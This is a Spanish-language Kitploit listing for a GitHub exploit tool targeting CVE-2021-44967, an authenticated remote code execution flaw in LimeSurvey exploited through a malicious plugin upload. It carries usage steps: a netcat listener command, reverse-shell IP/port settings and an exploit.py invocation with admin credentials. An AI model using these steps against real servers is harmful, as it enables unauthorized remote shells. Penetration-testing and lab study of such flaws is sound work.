Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Exploit automatizado de RCE para Limesurvey (CVE-2021-44967). Cadena de explotación optimizada para escalada de privilegios. 🚀

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 LimeSurvey RCE (CVE-2021-44967) - Ejecución Remota de Código Autenticada

Este repositorio contiene un exploit funcional para CVE-2021-44967, una vulnerabilidad de Ejecución Remota de Código autenticada en LimeSurvey.

🎯 Compatibilidad

Probado y confirmado funcionando en:

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 Resumen de la Vulnerabilidad

La vulnerabilidad permite a un usuario autenticado con privilegios administrativos cargar un plugin malicioso. Dado que LimeSurvey no valida estrictamente el contenido del ZIP del plugin ni impide la ejecución de archivos PHP en el directorio de plugins, un atacante puede lograr RCE accediendo directamente a la shell cargada.

✨ Características

  • 🤖 Explotación Automatizada: Inicia sesión, maneja tokens CSRF, carga, instala y activa el plugin automáticamente.
  • ✅ Compatibilidad Mejorada: config.xml actualizado para compatibilidad con LimeSurvey versiones 3.0 a 6.0.
  • 💣 Payloads Flexibles: Incluye una robusta shell inversa PHP.

🛠️ Uso

1️⃣ Prepara tu Listener

Inicia un listener de netcat en tu máquina:

root@kitploit:~
nc -lvnp 443

2️⃣ Configura la Shell Inversa

Edita php-rev.php y establece tu IP y puerto local:

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ Ejecuta el Exploit

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

Ejemplo:

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 Estructura del Repositorio

  • 🐍 exploit.py: El script principal de automatización.
  • 🐘 php-rev.php: Payload de shell inversa PHP.
  • ⚙️ config.xml: Archivo de configuración obligatorio del plugin de LimeSurvey.

⚠️ Aviso Legal

Esta herramienta es SOLO para fines educativos y pruebas de seguridad autorizadas. Estrictamente destinada para su uso en entornos controlados y legales (por ejemplo, CTFs, entornos de laboratorio o compromisos autorizados). El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Úsala de manera responsable y solo en sistemas en los que tengas permiso explícito para probar.

Descargar herramienta